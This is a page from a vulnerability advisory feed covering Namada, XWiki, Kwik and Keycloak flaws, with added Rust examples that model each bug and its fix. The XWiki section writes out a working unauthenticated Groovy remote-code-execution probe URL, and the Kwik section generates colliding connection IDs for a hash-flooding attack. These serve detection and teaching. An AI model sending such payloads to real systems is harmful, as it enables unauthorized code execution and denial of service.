CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

Description: Impact: Ledger crash. A user is able to initialize a post-genesis validator with a negative commission rate using the --force flag. If this validator gets into the consensus set, then when PoS inflation is computed inside fn update_rewards_products_and_mint_inflation, a call to mul_floor returns an Err, which propagates and makes finalize_block fail. Patches: This issue has been patched in apps version 1.1.0. The PoS validity predicate now enforces that the commission rate is not negative, and any transaction that fails the check is rejected, both for newly initialized validators and for commission rate changes of existing validators. Workarounds: There are no workarounds; users are advised to upgrade. References: https://github.com/anoma/namada/security/advisories/GHSA-2gw2-qgjg-xh6p https://github.com/advisories/GHSA-2gw2-qgjg-xh6p
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
Description: Impact: A malicious transaction may cause a crash in mempool validation. A transaction whose authorization section contains 256 or more public keys with valid matching signatures triggers an integer overflow in signature verification that causes the node to panic. Patches: This issue has been patched in apps version 1.1.0. Mempool validation has been fixed to avoid the overflow. Workarounds: There are no workarounds; users are advised to upgrade. References: https://github.com/anoma/namada/security/advisories/GHSA-82vg-5v4f-f9wq https://github.com/advisories/GHSA-82vg-5v4f-f9wq
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
Description: Impact: A malicious transaction may cause expensive computation in mempool validation. A transaction with many repeated sections makes the section hash calculation used for signature validation grow superlinearly (potentially cubically) in the number of sections. This may be used to significantly slow down the operation of nodes. Patches: This issue has been patched in apps version 1.1.0. Transaction sections are now checked for uniqueness, and the number of sections permitted in a single transaction has been limited to 10,000. Workarounds: There are no workarounds; users are advised to upgrade. References: https://github.com/anoma/namada/security/advisories/GHSA-f8qm-hmm3-fv7f https://github.com/advisories/GHSA-f8qm-hmm3-fv7f
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
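The three Namada advisories above share one lesson: a malformed transaction must be rejected with an error at admission (mempool validation or the validity predicate), never allowed to reach code that panics or fails inside block finalization. The block below is an added example, not Namada's code: it models a transaction as a list of sections and shows the checks the patches describe (section uniqueness, the 10,000-section cap, a bounded signer count, and a non-negative commission rate). The `Section`, `Tx` and `Reject` types, the 255 signer cap, the six-decimal commission encoding and the upper commission bound are all this example's assumptions; the advisory's threshold of 256 keys suggests an 8-bit counter, which is what the vulnerable counting function assumes.

```rust
use std::collections::HashSet;

/// Simplified transaction model for this example; Namada's real types differ.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum Section {
    Data(Vec<u8>),
    Code(Vec<u8>),
    Authorization { pubkeys: Vec<[u8; 32]>, signatures: Vec<[u8; 64]> },
}

pub struct Tx {
    pub sections: Vec<Section>,
}

#[derive(Debug, PartialEq, Eq)]
pub enum Reject {
    DuplicateSection(usize),
    TooManySections(usize),
    TooManySigners(usize),
    NegativeCommission(i64),
    CommissionAboveOne(i64),
}

/// Per-transaction section cap from the advisory (10,000).
pub const MAX_SECTIONS: usize = 10_000;
/// Signer cap for this example. The advisory gives no figure; what matters is that
/// the bound is explicit and checked before any counter can wrap.
pub const MAX_SIGNERS: usize = 255;

/// Vulnerable shape: the number of matching signatures is tracked in a u8.
/// The advisory's threshold of 256 suggests an 8-bit counter; that is this
/// example's assumption, not a statement about Namada's code. `expect` makes
/// the overflow panic explicit regardless of the build's overflow-check setting.
pub fn count_signers_vulnerable(pubkeys: &[[u8; 32]]) -> u8 {
    let mut n: u8 = 0;
    for _pk in pubkeys {
        n = n.checked_add(1).expect("signature counter overflowed");
    }
    n
}

/// Fixed shape: reject over-long signer lists up front and never panic.
pub fn count_signers_checked(pubkeys: &[[u8; 32]]) -> Result<usize, Reject> {
    if pubkeys.len() > MAX_SIGNERS {
        return Err(Reject::TooManySigners(pubkeys.len()));
    }
    Ok(pubkeys.len())
}

/// Mempool structural checks, run before any per-section hashing: a hard cap on the
/// section count, rejection of repeated sections, and the bounded signer count.
pub fn validate_sections(tx: &Tx) -> Result<(), Reject> {
    if tx.sections.len() > MAX_SECTIONS {
        return Err(Reject::TooManySections(tx.sections.len()));
    }
    let mut seen: HashSet<&Section> = HashSet::with_capacity(tx.sections.len());
    for (i, section) in tx.sections.iter().enumerate() {
        if !seen.insert(section) {
            return Err(Reject::DuplicateSection(i));
        }
        if let Section::Authorization { pubkeys, .. } = section {
            count_signers_checked(pubkeys)?;
        }
    }
    Ok(())
}

/// Commission rate check at the validity-predicate layer. The rate is a fixed-point
/// value with six decimals here (hypothetical; Namada uses its own Dec type).
/// Rejecting the transaction means a negative rate never reaches the inflation
/// arithmetic in block finalization. The upper bound is this example's addition;
/// the advisory only describes the negative case.
pub fn validate_commission_rate_micro(rate: i64) -> Result<i64, Reject> {
    const ONE: i64 = 1_000_000;
    if rate < 0 {
        return Err(Reject::NegativeCommission(rate));
    }
    if rate > ONE {
        return Err(Reject::CommissionAboveOne(rate));
    }
    Ok(rate)
}
```

The order inside `validate_sections` is deliberate: the length cap and the duplicate check cost O(n) and run before anything that hashes section contents, so an attacker cannot buy superlinear work with a long list of repeated sections.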
Description: Impact: Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable. Patches: This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Workarounds: The line in Main.SolrSearchMacros that outputs the feed content (linked from the advisory) can be edited to match the rawResponse macro, also linked there, so that the raw response is emitted with a content type of application/xml instead of simply outputting the content of the feed. Attribution: This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative. References: https://jira.xwiki.org/browse/XWIKI-22149 https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40 https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-...
Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)
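The reproduction step above is easy to turn into a fleet check, but the check needs to distinguish two outcomes: the marker Hello from search text:42 appearing in the channel title means the Groovy ran server-side (23 + 19 was evaluated), whereas the payload coming back as text means the `text` parameter is reflected but not executed. The block below is an added example, not XWiki's or the advisory's code: it builds the advisory's probe URL verbatim, extracts the RSS channel title and classifies the response. The host wiki.example.test and the three sample responses are constructed for the test; fetching is left to whatever HTTP client you use so the block runs offline.

```rust
/// Result of inspecting the RSS feed returned for the advisory's probe request.
#[derive(Debug, PartialEq, Eq)]
pub enum Probe {
    /// The Groovy executed server-side: 23 + 19 was evaluated into the feed title.
    Vulnerable,
    /// The payload came back as text, unevaluated. Not the RCE, but the `text`
    /// parameter still reaches the feed title, so keep the host on a re-check list.
    ReflectedOnly,
    /// No trace of the marker in the channel title.
    NotVulnerable,
}

/// Query string from the advisory, verbatim. Decoded it reads:
/// `}}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}} `
/// The bare quotes are as the advisory gives them; HTTP clients percent-encode them.
const PROBE_QUERY: &str = r#"media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"#;

/// Build the probe URL for an instance at `base` ("http://wiki.example.test" in the
/// test is a made-up host for this example).
pub fn probe_url(base: &str) -> String {
    format!("{}/xwiki/bin/get/Main/SolrSearch?{}", base.trim_end_matches('/'), PROBE_QUERY)
}

/// The first <title> element in an RSS 2.0 document is the channel title, which is
/// where the advisory says the injected output appears.
pub fn channel_title(rss: &str) -> Option<&str> {
    let start = rss.find("<title>")? + "<title>".len();
    let end = start + rss[start..].find("</title>")?;
    Some(&rss[start..end])
}

/// Evaluated output is the only proof of execution; an unevaluated "23 + 19" or a
/// visible {{groovy}} tag means the input was rendered as text.
pub fn classify(rss: &str) -> Probe {
    match channel_title(rss) {
        Some(t) if t.contains("Hello from search text:42") => Probe::Vulnerable,
        Some(t) if t.contains("23 + 19") || t.contains("{{groovy}}") => Probe::ReflectedOnly,
        _ => Probe::NotVulnerable,
    }
}

/// Constructed responses for the test; not captured from a real instance.
pub const SAMPLE_VULNERABLE: &str = concat!(
    r#"<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel>"#,
    "<title>Hello from search text:42</title>",
    "<link>http://wiki.example.test/xwiki/bin/view/Main/SolrSearch</link>",
    "</channel></rss>"
);
pub const SAMPLE_REFLECTED: &str = concat!(
    r#"<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel>"#,
    r#"<title>}}}{{async async=false}}{{groovy}}println(&quot;Hello from&quot; + &quot; search text:&quot; + (23 + 19)){{/groovy}}{{/async}}</title>"#,
    "</channel></rss>"
);
pub const SAMPLE_CLEAN: &str =
    r#"<rss version="2.0"><channel><title>Search</title></channel></rss>"#;
```

Run the probe only against instances you are authorized to test; the payload executes code on a vulnerable server, even if all it does is print a string.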

CVE-2025-23020

Description: An issue was discovered in Kwik before 0.10.1. A hash collision vulnerability (in the hash table used to manage connections) allows remote attackers to cause a considerable CPU load on the server (a Hash DoS attack) by initiating connections with colliding Source Connection IDs (SCIDs). References https://nvd.nist.gov/vuln/detail/CVE-2025-23020 https://github.com/ncc-pbottine/QUIC-Hash-Dos-Advisory https://github.com/ptrd/kwik/releases/tag/v0.10.1 https://github.com/ptrd/kwik/commit/b0733d72bad76bc5d8df2f4a7792ebb2539ebdc8 https://github.com/advisories/GHSA-9f57-9rhg-4hvm

CVSS: MEDIUM (5.3)

EPSS Score: 0.12%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)
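The Kwik advisory above is a hash-flooding attack: when the connection table hashes Source Connection IDs with a function the attacker can compute offline, the attacker picks SCIDs that all land in one bucket, and every new handshake then walks the whole chain. The block below is an added example, not Kwik's code: a small chained hash table that counts key comparisons, an unkeyed byte-sum hash standing in for any predictable hash (the advisory does not say which hash Kwik used), a generator of colliding 4-byte SCIDs, and the fix, a keyed SipHash via std's RandomState seeded per process. The 1024-bucket size and the 2000-connection attack are this example's parameters.

```rust
use std::collections::hash_map::RandomState;
use std::hash::{BuildHasher, Hash, Hasher};

/// Minimal chained hash table keyed by connection ID. It exposes chain lengths and
/// key comparisons so the cost of the attack is measurable. A model of the pattern,
/// not Kwik's connection table.
pub struct ConnTable<F: Fn(&[u8]) -> u64> {
    buckets: Vec<Vec<Vec<u8>>>,
    hash: F,
    probes: u64,
}

impl<F: Fn(&[u8]) -> u64> ConnTable<F> {
    pub fn new(nbuckets: usize, hash: F) -> Self {
        ConnTable { buckets: vec![Vec::new(); nbuckets], hash, probes: 0 }
    }

    /// Insert a source connection ID; returns false if it was already present.
    /// Every key compared on the way down the chain is CPU the attacker made us spend.
    pub fn insert(&mut self, scid: &[u8]) -> bool {
        let idx = ((self.hash)(scid) % self.buckets.len() as u64) as usize;
        let chain = &mut self.buckets[idx];
        let mut compared = 0u64;
        let mut found = false;
        for existing in chain.iter() {
            compared += 1;
            if existing.as_slice() == scid {
                found = true;
                break;
            }
        }
        if !found {
            chain.push(scid.to_vec());
        }
        self.probes += compared;
        !found
    }

    pub fn max_chain(&self) -> usize {
        self.buckets.iter().map(Vec::len).max().unwrap_or(0)
    }

    pub fn probes(&self) -> u64 {
        self.probes
    }
}

/// Unkeyed, attacker-predictable hash: a plain byte sum, standing in for any hash
/// whose output can be computed offline (this example's stand-in, not Kwik's hash).
pub fn unkeyed_hash(cid: &[u8]) -> u64 {
    cid.iter().map(|&b| b as u64).sum()
}

/// Keyed hash: SipHash via std's RandomState, seeded per process, so bucket
/// placement cannot be predicted without the key.
pub fn keyed_hasher() -> impl Fn(&[u8]) -> u64 {
    let state = RandomState::new();
    move |cid: &[u8]| {
        let mut h = state.build_hasher();
        cid.hash(&mut h);
        h.finish()
    }
}

/// Attacker-chosen 4-byte SCIDs that all sum to 510, so every one lands in the same
/// bucket under `unkeyed_hash`. Distinct for n <= 65536.
pub fn colliding_scids(n: usize) -> Vec<[u8; 4]> {
    (0..n)
        .map(|i| {
            let b0 = (i & 0xff) as u8;
            let b1 = ((i >> 8) & 0xff) as u8;
            [b0, b1, 255 - b0, 255 - b1]
        })
        .collect()
}

/// Simulate `n` colliding handshakes against a 1024-bucket table and report
/// (longest chain, total key comparisons).
pub fn attack_stats(n: usize, keyed: bool) -> (usize, u64) {
    let scids = colliding_scids(n);
    if keyed {
        let mut t = ConnTable::new(1024, keyed_hasher());
        for s in &scids {
            t.insert(s);
        }
        (t.max_chain(), t.probes())
    } else {
        let mut t = ConnTable::new(1024, unkeyed_hash);
        for s in &scids {
            t.insert(s);
        }
        (t.max_chain(), t.probes())
    }
}
```

With the unkeyed hash, 2000 colliding SCIDs produce one chain of length 2000 and 1,999,000 key comparisons; with the keyed hash the same SCIDs spread across buckets and the comparison count drops by three orders of magnitude. Keying the hash is the standard fix; capping the number of half-open connections per source is the complementary one.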

CVE-2024-4028

Description: A vulnerability was found in Keycloak. This issue may allow a privileged attacker to use a malicious payload as the permission while creating items (Resource and Permissions) from the admin console, leading to a stored cross-site scripting (XSS) attack. References https://nvd.nist.gov/vuln/detail/CVE-2024-4028 https://access.redhat.com/security/cve/CVE-2024-4028 https://bugzilla.redhat.com/show_bug.cgi?id=2276418 https://github.com/advisories/GHSA-q4xq-445g-g6ch

EPSS Score: 0.04%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)

CVE-2025-1391

Description: A flaw was found in the Keycloak organization feature, which allows the incorrect assignment of an organization to a user if their username or email matches the organization’s domain pattern. This issue occurs at the mapper level, leading to misrepresentation in tokens. If an application relies on these claims for authorization, it may incorrectly assume a user belongs to an organization they are not a member of, potentially granting unauthorized access or privileges. References https://nvd.nist.gov/vuln/detail/CVE-2025-1391 https://access.redhat.com/security/cve/CVE-2025-1391 https://bugzilla.redhat.com/show_bug.cgi?id=2346082 https://github.com/keycloak/keycloak/commit/5aa2b4c75bb474303ab807017582bc01a9f7e378 https://github.com/advisories/GHSA-rq4w-cjrr-h8w8

EPSS Score: 0.03%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)
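The CVE-2025-1391 entry above says the mistake sits at the mapper level: the organization claim was derived from a username or email matching an organization's domain pattern, not from recorded membership, and any application that authorizes on that claim inherits the wrong answer. The block below is an added example, not Keycloak's code: a hypothetical user and organization model, the flawed domain-derived mapper beside the membership-based one, and the relying-party check that turns the wrong claim into unauthorized access. The organization "acme", its domain, and the users are constructed for the test.

```rust
/// Hypothetical organization and user records for this example; not Keycloak's
/// data model.
pub struct Org {
    pub alias: &'static str,
    pub domains: Vec<&'static str>,
    pub members: Vec<&'static str>,
}

pub struct User {
    pub username: &'static str,
    pub email: &'static str,
}

fn domain_of(identifier: &str) -> Option<&str> {
    identifier.rsplit_once('@').map(|(_, d)| d)
}

/// The flawed behaviour: the `organization` claim is derived from whether the user's
/// email, or a username that looks like an address, matches an organization's domain.
/// Anyone who can register with a matching address gets the claim.
pub fn organization_claim_by_domain<'a>(user: &User, orgs: &'a [Org]) -> Vec<&'a str> {
    let candidates = [domain_of(user.email), domain_of(user.username)];
    orgs.iter()
        .filter(|o| {
            candidates
                .iter()
                .flatten()
                .any(|d| o.domains.iter().any(|od| od.eq_ignore_ascii_case(d)))
        })
        .map(|o| o.alias)
        .collect()
}

/// The corrected behaviour: the claim reflects recorded membership only. A domain
/// match may drive invitation or auto-join flows, but it is not membership.
pub fn organization_claim_by_membership<'a>(user: &User, orgs: &'a [Org]) -> Vec<&'a str> {
    orgs.iter()
        .filter(|o| o.members.contains(&user.username))
        .map(|o| o.alias)
        .collect()
}

/// What a relying application does with the claim: grant access if the required
/// organization is present. With the flawed mapper this is where the error bites.
pub fn app_allows(claim: &[&str], required_org: &str) -> bool {
    claim.iter().any(|o| *o == required_org)
}

/// Constructed directory for the example: one organization, one real member.
pub fn sample_orgs() -> Vec<Org> {
    vec![Org {
        alias: "acme",
        domains: vec!["acme.example"],
        members: vec!["bob"],
    }]
}
```

If an application cannot upgrade the identity provider immediately, the mitigating control is on the relying-party side: do not treat the organization claim as an authorization decision on its own, and check membership against the source of truth for sensitive operations.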
Description: An unknown leaker has released what they claim to be an archive of internal Matrix chat logs belonging to the Black Basta ransomware operation. [...]
Source: BleepingComputer
February 20th, 2025 (5 months ago)
Description: The China-backed threat group often acts swiftly, going from initial access to compromise in just one day, a behavior atypical of cybercriminal groups.
Source: Dark Reading
February 20th, 2025 (5 months ago)
Description: William discusses what happens when security is an afterthought rather than baked into processes and highlights the latest of Talos' security research.
Source: Cisco Talos Blog
February 20th, 2025 (5 months ago)